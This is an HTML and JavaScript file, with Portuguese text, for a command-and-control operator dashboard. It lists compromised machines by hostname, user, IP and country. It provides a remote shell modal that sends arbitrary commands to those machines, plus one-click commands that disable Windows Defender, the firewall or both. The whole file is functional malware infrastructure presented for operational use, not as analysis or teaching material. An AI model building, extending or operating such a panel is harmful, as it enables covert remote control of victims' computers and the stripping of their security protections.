<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>C2 Admin Dashboard</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: #333;
            min-height: 100vh;
            padding: 20px;
        }
        
        .container {
            max-width: 1400px;
            margin: 0 auto;
        }
        
        header {
            background: rgba(255, 255, 255, 0.95);
            padding: 20px 30px;
            border-radius: 10px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            margin-bottom: 30px;
        }
        
        h1 {
            color: #667eea;
            font-size: 28px;
            margin-bottom: 10px;
        }
        
        .stats {
            display: grid;
            grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
            gap: 20px;
            margin-bottom: 30px;
        }
        
        .stat-card {
            background: rgba(255, 255, 255, 0.95);
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }
        
        .stat-card h3 {
            color: #666;
            font-size: 14px;
            margin-bottom: 10px;
        }
        
        .stat-card .number {
            font-size: 32px;
            font-weight: bold;
            color: #667eea;
        }
        
        .clients-section {
            background: rgba(255, 255, 255, 0.95);
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }
        
        .clients-section h2 {
            margin-bottom: 20px;
            color: #667eea;
        }
        
        table {
            width: 100%;
            border-collapse: collapse;
        }
        
        th, td {
            padding: 12px;
            text-align: left;
            border-bottom: 1px solid #ddd;
        }
        
        th {
            background: #667eea;
            color: white;
            font-weight: 600;
        }
        
        tr:hover {
            background: #f5f5f5;
        }
        
        .status {
            display: inline-block;
            padding: 4px 12px;
            border-radius: 20px;
            font-size: 12px;
            font-weight: bold;
        }
        
        .status.online {
            background: #4caf50;
            color: white;
        }
        
        .status.offline {
            background: #f44336;
            color: white;
        }
        
        .actions button {
            padding: 8px 16px;
            margin: 3px;
            border: none;
            border-radius: 6px;
            cursor: pointer;
            font-size: 13px;
            font-weight: 600;
            transition: all 0.3s;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .btn-shell {
            background: linear-gradient(135deg, #667eea 0%, #764ba2 100%);
            color: white;
        }

        .btn-info {
            background: linear-gradient(135deg, #f093fb 0%, #f5576c 100%);
            color: white;
        }

        .btn-defender {
            background: linear-gradient(135deg, #4facfe 0%, #00f2fe 100%);
            color: white;
        }

        .btn-firewall {
            background: linear-gradient(135deg, #fa709a 0%, #fee140 100%);
            color: white;
        }

        .btn-all {
            background: linear-gradient(135deg, #ff0844 0%, #ffb199 100%);
            color: white;
        }

        button:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 8px rgba(0,0,0,0.2);
        }

        button:active {
            transform: translateY(0);
        }

        @keyframes slideIn {
            from {
                transform: translateX(400px);
                opacity: 0;
            }
            to {
                transform: translateX(0);
                opacity: 1;
            }
        }

        @keyframes slideOut {
            from {
                transform: translateX(0);
                opacity: 1;
            }
            to {
                transform: translateX(400px);
                opacity: 0;
            }
        }
        
        .login-form {
            max-width: 400px;
            margin: 100px auto;
            background: white;
            padding: 40px;
            border-radius: 10px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
        }
        
        .login-form h2 {
            margin-bottom: 20px;
            color: #667eea;
        }
        
        .login-form input {
            width: 100%;
            padding: 12px;
            margin-bottom: 15px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-size: 14px;
        }
        
        .login-form button {
            width: 100%;
            padding: 12px;
            background: #667eea;
            color: white;
            border: none;
            border-radius: 4px;
            font-size: 16px;
            cursor: pointer;
        }
        
        .hidden {
            display: none;
        }
    </style>
</head>
<body>
    <!-- Formulário de Login -->
    <div id="loginForm" class="login-form">
        <h2>🔐 C2 Admin Login</h2>
        <input type="password" id="password" placeholder="Senha de Admin">
        <button onclick="login()">Entrar</button>
    </div>

    <!-- Dashboard Principal -->
    <div id="dashboard" class="container hidden">
        <header>
            <h1>🎯 C2 Admin Dashboard</h1>
            <p>Sistema de Administração Remota</p>
        </header>

        <div class="stats">
            <div class="stat-card">
                <h3>Total de Clientes</h3>
                <div class="number" id="totalClients">0</div>
            </div>
            <div class="stat-card">
                <h3>Online</h3>
                <div class="number" id="onlineClients" style="color: #4caf50;">0</div>
            </div>
            <div class="stat-card">
                <h3>Offline</h3>
                <div class="number" id="offlineClients" style="color: #f44336;">0</div>
            </div>
        </div>

        <div class="clients-section">
            <h2>📡 Clientes Conectados</h2>
            <table>
                <thead>
                    <tr>
                        <th>Status</th>
                        <th>Hostname</th>
                        <th>Usuário</th>
                        <th>IP</th>
                        <th>País</th>
                        <th>Sistema</th>
                        <th>Último Contato</th>
                        <th>Ações</th>
                    </tr>
                </thead>
                <tbody id="clientsTable">
                    <tr>
                        <td colspan="8" style="text-align: center;">Carregando...</td>
                    </tr>
                </tbody>
            </table>
        </div>
    </div>

    <script>
        let authToken = '';
        let commandResults = {};

        function login() {
            const password = document.getElementById('password').value;
            authToken = password;

            // Salvar token no localStorage
            localStorage.setItem('authToken', authToken);

            // Testar autenticação
            fetch('/api/clients', {
                headers: {
                    'Authorization': `Bearer ${authToken}`
                }
            })
            .then(response => {
                if (response.ok) {
                    document.getElementById('loginForm').classList.add('hidden');
                    document.getElementById('dashboard').classList.remove('hidden');
                    loadClients();
                    setInterval(loadClients, 5000); // Atualizar a cada 5 segundos
                    setInterval(checkResults, 3000); // Verificar resultados a cada 3 segundos
                } else {
                    alert('Senha incorreta!');
                }
            })
            .catch(error => {
                alert('Erro ao conectar ao servidor');
            });
        }

        // Verificar se já está logado
        window.onload = function() {
            const savedToken = localStorage.getItem('authToken');
            if (savedToken) {
                authToken = savedToken;
                document.getElementById('password').value = savedToken;
                login();
            }
        };

        function loadClients() {
            fetch('/api/clients', {
                headers: {
                    'Authorization': `Bearer ${authToken}`
                }
            })
            .then(response => {
                if (!response.ok) {
                    // Não deslogar, apenas continuar
                    return [];
                }
                return response.json();
            })
            .then(clients => {
                if (clients && clients.length >= 0) {
                    updateStats(clients);
                    updateTable(clients);
                }
            })
            .catch(error => {
                console.error('Erro ao carregar clientes:', error);
            });
        }

        function checkResults() {
            // Verificar resultados de comandos pendentes
            for (let cmdId in commandResults) {
                fetch(`/api/result/${cmdId}`, {
                    headers: {
                        'Authorization': `Bearer ${authToken}`
                    }
                })
                .then(response => response.json())
                .then(data => {
                    if (data.result) {
                        showResult(cmdId, data.result);
                        delete commandResults[cmdId];
                    }
                })
                .catch(error => {
                    console.error('Erro ao verificar resultado:', error);
                });
            }
        }

        function updateStats(clients) {
            const total = clients.length;
            const online = clients.filter(c => c.status === 'online').length;
            const offline = total - online;

            document.getElementById('totalClients').textContent = total;
            document.getElementById('onlineClients').textContent = online;
            document.getElementById('offlineClients').textContent = offline;
        }

        function updateTable(clients) {
            const tbody = document.getElementById('clientsTable');

            if (clients.length === 0) {
                tbody.innerHTML = '<tr><td colspan="8" style="text-align: center;">Nenhum cliente conectado</td></tr>';
                return;
            }

            tbody.innerHTML = clients.map(client => `
                <tr>
                    <td><span class="status ${client.status}">${client.status === 'online' ? '🟢 Online' : '🔴 Offline'}</span></td>
                    <td>${client.hostname}</td>
                    <td>${client.username}</td>
                    <td>${client.ip_address}</td>
                    <td>${client.country}</td>
                    <td>${client.os_version}</td>
                    <td>${formatDate(client.last_seen)}</td>
                    <td class="actions">
                        <button class="btn-shell" onclick="openWebShell('${client.client_id}', '${client.hostname}')">🖥️ WebShell</button>
                        <button class="btn-info" onclick="sendCommand('${client.client_id}', 'get_info')">ℹ️ Info</button>
                        <button class="btn-defender" onclick="sendCommand('${client.client_id}', 'disable_defender')">🛡️ Defender</button>
                        <button class="btn-firewall" onclick="sendCommand('${client.client_id}', 'disable_firewall')">🔥 Firewall</button>
                        <button class="btn-all" onclick="sendCommand('${client.client_id}', 'disable_all')">⚡ Tudo</button>
                    </td>
                </tr>
            `).join('');
        }

        function formatDate(dateStr) {
            const date = new Date(dateStr);
            return date.toLocaleString('pt-BR');
        }

        function openWebShell(clientId, hostname) {
            // Criar modal de WebShell
            const modal = document.createElement('div');
            modal.style.cssText = `
                position: fixed;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background: rgba(0,0,0,0.9);
                display: flex;
                align-items: center;
                justify-content: center;
                z-index: 9999;
            `;

            modal.innerHTML = `
                <div style="
                    background: #1e1e1e;
                    width: 90%;
                    max-width: 1200px;
                    height: 80vh;
                    border-radius: 10px;
                    display: flex;
                    flex-direction: column;
                    box-shadow: 0 10px 40px rgba(0,0,0,0.5);
                ">
                    <div style="
                        background: #2d2d2d;
                        padding: 15px 20px;
                        border-radius: 10px 10px 0 0;
                        display: flex;
                        justify-content: space-between;
                        align-items: center;
                    ">
                        <div style="color: #4caf50; font-weight: bold; font-family: monospace;">
                            🖥️ WebShell - ${hostname}
                        </div>
                        <button onclick="this.closest('.webshell-modal').remove()" style="
                            background: #f44336;
                            color: white;
                            border: none;
                            padding: 5px 15px;
                            border-radius: 5px;
                            cursor: pointer;
                        ">✕ Fechar</button>
                    </div>
                    <div id="terminal-output-${clientId}" style="
                        flex: 1;
                        overflow-y: auto;
                        padding: 20px;
                        font-family: 'Courier New', monospace;
                        font-size: 14px;
                        line-height: 1.6;
                        color: #00ff00;
                        background: #000;
                    ">
                        <div style="color: #4caf50;">WebShell iniciado. Digite seus comandos abaixo.</div>
                        <div style="color: #888;">Dica: Use 'cls' para limpar a tela</div>
                        <div style="color: #888;">─────────────────────────────────────────────────</div>
                    </div>
                    <div style="
                        background: #2d2d2d;
                        padding: 15px 20px;
                        border-radius: 0 0 10px 10px;
                        display: flex;
                        gap: 10px;
                    ">
                        <input type="text" id="terminal-input-${clientId}" placeholder="Digite o comando..." style="
                            flex: 1;
                            background: #1e1e1e;
                            border: 1px solid #4caf50;
                            color: #00ff00;
                            padding: 10px 15px;
                            border-radius: 5px;
                            font-family: 'Courier New', monospace;
                            font-size: 14px;
                        ">
                        <button onclick="executeShellCommand('${clientId}')" style="
                            background: #4caf50;
                            color: white;
                            border: none;
                            padding: 10px 30px;
                            border-radius: 5px;
                            cursor: pointer;
                            font-weight: bold;
                        ">Executar</button>
                    </div>
                </div>
            `;

            modal.className = 'webshell-modal';
            document.body.appendChild(modal);

            // Focar no input
            const input = document.getElementById(`terminal-input-${clientId}`);
            input.focus();

            // Enter para executar
            input.addEventListener('keypress', function(e) {
                if (e.key === 'Enter') {
                    executeShellCommand(clientId);
                }
            });

            // Histórico de comandos
            let commandHistory = [];
            let historyIndex = -1;

            input.addEventListener('keydown', function(e) {
                if (e.key === 'ArrowUp') {
                    e.preventDefault();
                    if (historyIndex < commandHistory.length - 1) {
                        historyIndex++;
                        input.value = commandHistory[commandHistory.length - 1 - historyIndex];
                    }
                } else if (e.key === 'ArrowDown') {
                    e.preventDefault();
                    if (historyIndex > 0) {
                        historyIndex--;
                        input.value = commandHistory[commandHistory.length - 1 - historyIndex];
                    } else {
                        historyIndex = -1;
                        input.value = '';
                    }
                }
            });

            // Salvar histórico
            window[`commandHistory_${clientId}`] = commandHistory;
        }

        function executeShellCommand(clientId) {
            const input = document.getElementById(`terminal-input-${clientId}`);
            const output = document.getElementById(`terminal-output-${clientId}`);
            const cmd = input.value.trim();

            if (!cmd) return;

            // Adicionar ao histórico
            const history = window[`commandHistory_${clientId}`] || [];
            history.push(cmd);
            window[`commandHistory_${clientId}`] = history;

            // Comando especial: limpar tela
            if (cmd.toLowerCase() === 'cls' || cmd.toLowerCase() === 'clear') {
                output.innerHTML = '<div style="color: #4caf50;">Tela limpa.</div>';
                input.value = '';
                return;
            }

            // Mostrar comando no terminal
            const cmdDiv = document.createElement('div');
            cmdDiv.style.cssText = 'color: #fff; margin-top: 10px;';
            cmdDiv.innerHTML = `<span style="color: #4caf50;">PS C:\\></span> ${cmd}`;
            output.appendChild(cmdDiv);

            // Mostrar "executando..."
            const loadingDiv = document.createElement('div');
            loadingDiv.style.cssText = 'color: #888;';
            loadingDiv.textContent = '⏳ Executando...';
            output.appendChild(loadingDiv);

            // Scroll para o final
            output.scrollTop = output.scrollHeight;

            // Limpar input
            input.value = '';

            // Enviar comando
            sendShellCommand(clientId, cmd, loadingDiv, output);
        }

        function sendShellCommand(clientId, cmd, loadingDiv, output) {
            fetch('/api/command', {
                method: 'POST',
                headers: {
                    'Authorization': `Bearer ${authToken}`,
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    client_id: clientId,
                    command: {
                        type: 'shell',
                        params: { cmd: cmd }
                    }
                })
            })
            .then(response => response.json())
            .then(data => {
                // Aguardar resultado
                waitForShellResult(data.command_id, loadingDiv, output);
            })
            .catch(error => {
                loadingDiv.remove();
                const errorDiv = document.createElement('div');
                errorDiv.style.cssText = 'color: #f44336;';
                errorDiv.textContent = '❌ Erro ao enviar comando';
                output.appendChild(errorDiv);
                output.scrollTop = output.scrollHeight;
            });
        }

        function waitForShellResult(cmdId, loadingDiv, output) {
            const checkResult = () => {
                fetch(`/api/result/${cmdId}`, {
                    headers: {
                        'Authorization': `Bearer ${authToken}`
                    }
                })
                .then(response => response.json())
                .then(data => {
                    if (data.result) {
                        loadingDiv.remove();
                        const resultDiv = document.createElement('div');
                        resultDiv.style.cssText = 'color: #00ff00; white-space: pre-wrap; margin-bottom: 10px;';
                        resultDiv.textContent = data.result;
                        output.appendChild(resultDiv);
                        output.scrollTop = output.scrollHeight;
                    } else {
                        // Tentar novamente em 1 segundo
                        setTimeout(checkResult, 1000);
                    }
                })
                .catch(error => {
                    loadingDiv.remove();
                    const errorDiv = document.createElement('div');
                    errorDiv.style.cssText = 'color: #f44336;';
                    errorDiv.textContent = '❌ Erro ao obter resultado';
                    output.appendChild(errorDiv);
                    output.scrollTop = output.scrollHeight;
                });
            };

            checkResult();
        }

        function sendCommand(clientId, type) {
            let params = {};

            fetch('/api/command', {
                method: 'POST',
                headers: {
                    'Authorization': `Bearer ${authToken}`,
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    client_id: clientId,
                    command: {
                        type: type,
                        params: params
                    }
                })
            })
            .then(response => response.json())
            .then(data => {
                commandResults[data.command_id] = type;

                // Mostrar notificação de envio
                showNotification(`✅ Comando ${type} enviado! Aguardando resposta...`, 'success');

                // Aguardar resultado
                setTimeout(() => {
                    checkCommandResult(data.command_id, type);
                }, 2000);
            })
            .catch(error => {
                showNotification('❌ Erro ao enviar comando', 'error');
            });
        }

        function checkCommandResult(cmdId, type) {
            fetch(`/api/result/${cmdId}`, {
                headers: {
                    'Authorization': `Bearer ${authToken}`
                }
            })
            .then(response => response.json())
            .then(data => {
                if (data.result) {
                    showResult(type, data.result);
                } else {
                    // Tentar novamente em 2 segundos
                    setTimeout(() => checkCommandResult(cmdId, type), 2000);
                }
            })
            .catch(error => {
                console.error('Erro ao verificar resultado:', error);
            });
        }

        function showResult(type, result) {
            let title = '';
            switch(type) {
                case 'shell':
                    title = '💻 Resultado do Shell';
                    break;
                case 'get_info':
                    title = 'ℹ️ Informações do Sistema';
                    break;
                case 'disable_defender':
                    title = '🛡️ Windows Defender';
                    break;
                case 'disable_firewall':
                    title = '🔥 Firewall';
                    break;
                case 'disable_all':
                    title = '⚡ Desativar Tudo';
                    break;
                default:
                    title = '📋 Resultado';
            }

            // Criar modal com resultado
            const modal = document.createElement('div');
            modal.style.cssText = `
                position: fixed;
                top: 0;
                left: 0;
                width: 100%;
                height: 100%;
                background: rgba(0,0,0,0.8);
                display: flex;
                align-items: center;
                justify-content: center;
                z-index: 9999;
            `;

            modal.innerHTML = `
                <div style="
                    background: white;
                    padding: 30px;
                    border-radius: 10px;
                    max-width: 800px;
                    max-height: 80vh;
                    overflow-y: auto;
                    box-shadow: 0 10px 40px rgba(0,0,0,0.3);
                ">
                    <h2 style="margin-bottom: 20px; color: #667eea;">${title}</h2>
                    <pre style="
                        background: #f5f5f5;
                        padding: 20px;
                        border-radius: 5px;
                        overflow-x: auto;
                        white-space: pre-wrap;
                        word-wrap: break-word;
                        font-family: 'Courier New', monospace;
                        font-size: 13px;
                        line-height: 1.5;
                    ">${result}</pre>
                    <button onclick="this.parentElement.parentElement.remove()" style="
                        margin-top: 20px;
                        padding: 10px 30px;
                        background: #667eea;
                        color: white;
                        border: none;
                        border-radius: 5px;
                        cursor: pointer;
                        font-size: 14px;
                    ">Fechar</button>
                </div>
            `;

            modal.onclick = function(e) {
                if (e.target === modal) {
                    modal.remove();
                }
            };

            document.body.appendChild(modal);
        }

        function showNotification(message, type) {
            const notification = document.createElement('div');
            notification.style.cssText = `
                position: fixed;
                top: 20px;
                right: 20px;
                padding: 15px 25px;
                background: ${type === 'success' ? '#4caf50' : '#f44336'};
                color: white;
                border-radius: 5px;
                box-shadow: 0 4px 6px rgba(0,0,0,0.2);
                z-index: 10000;
                animation: slideIn 0.3s ease-out;
            `;
            notification.textContent = message;

            document.body.appendChild(notification);

            setTimeout(() => {
                notification.style.animation = 'slideOut 0.3s ease-out';
                setTimeout(() => notification.remove(), 300);
            }, 3000);
        }

        // Permitir login com Enter
        document.getElementById('password').addEventListener('keypress', function(e) {
            if (e.key === 'Enter') {
                login();
            }
        });
    </script>
</body>
</html>

